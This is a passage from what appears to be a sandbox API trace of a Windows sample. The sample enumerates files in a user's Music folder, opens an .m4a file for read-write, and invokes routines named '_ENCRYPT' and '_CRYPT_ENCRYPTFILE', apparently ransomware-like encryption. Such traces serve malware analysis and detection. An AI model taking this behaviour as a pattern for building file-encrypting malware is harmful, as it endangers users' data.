wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0180.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0180.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0180.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0180.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.998] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.998] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.998] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.998] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.998] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0180.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0180.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0180.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0180.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0180.999] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.999] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.999] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 0x90add8 [0181.001] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0181.001] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.001] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 0x90add8 [0181.002] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0181.002] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.002] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.002] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.002] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0181.002] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0181.002] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0181.002] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0181.002] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0181.002] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0181.002] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0181.004] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\4b9s3wh6aiujay85.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0181.006] FreeLibrary (hLibModule=0x75990000) returned 1 [0181.006] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0181.017] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0181.017] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0181.017] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0181.018] FreeLibrary (hLibModule=0x75990000) returned 1 [0181.018] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0181.018] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0181.018] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0181.018] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0181.018] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.018] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0181.018] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0181.018] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.018] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.018] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.018] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0181.018] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.018] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.019] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.019] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29386dc0, ftCreationTime.dwHighDateTime=0x1d5d951, ftLastAccessTime.dwLowDateTime=0x94d68360, ftLastAccessTime.dwHighDateTime=0x1d5dc48, ftLastWriteTime.dwLowDateTime=0x94d68360, ftLastWriteTime.dwHighDateTime=0x1d5dc48, nFileSizeHigh=0x0, nFileSizeLow=0x11a65, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="4b9s3WH6aiuJAy85.m4a", cAlternateFileName="4B9S3W~1.M4A")) returned 0x90add8 [0181.020] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0181.020] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.020] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29386dc0, ftCreationTime.dwHighDateTime=0x1d5d951, ftLastAccessTime.dwLowDateTime=0x94d68360, ftLastAccessTime.dwHighDateTime=0x1d5dc48, ftLastWriteTime.dwLowDateTime=0x94d68360, ftLastWriteTime.dwHighDateTime=0x1d5dc48, nFileSizeHigh=0x0, nFileSizeLow=0x11a65, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="4b9s3WH6aiuJAy85.m4a", cAlternateFileName="4B9S3W~1.M4A")) returned 0x90add8 [0181.021] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0181.021] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WH6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aiuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iuJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uJAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAy85.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.023] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.023] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0181.024] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0181.024] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0181.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0181.024] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0181.024] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0181.024] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0181.024] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0181.024] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.024] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.m4a", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29386dc0, ftCreationTime.dwHighDateTime=0x1d5d951, ftLastAccessTime.dwLowDateTime=0x94d68360, ftLastAccessTime.dwHighDateTime=0x1d5dc48, ftLastWriteTime.dwLowDateTime=0x94d68360, ftLastWriteTime.dwHighDateTime=0x1d5dc48, nFileSizeHigh=0x0, nFileSizeLow=0x11a65, dwReserved0=0x87ef08, dwReserved1=0x8a7560, 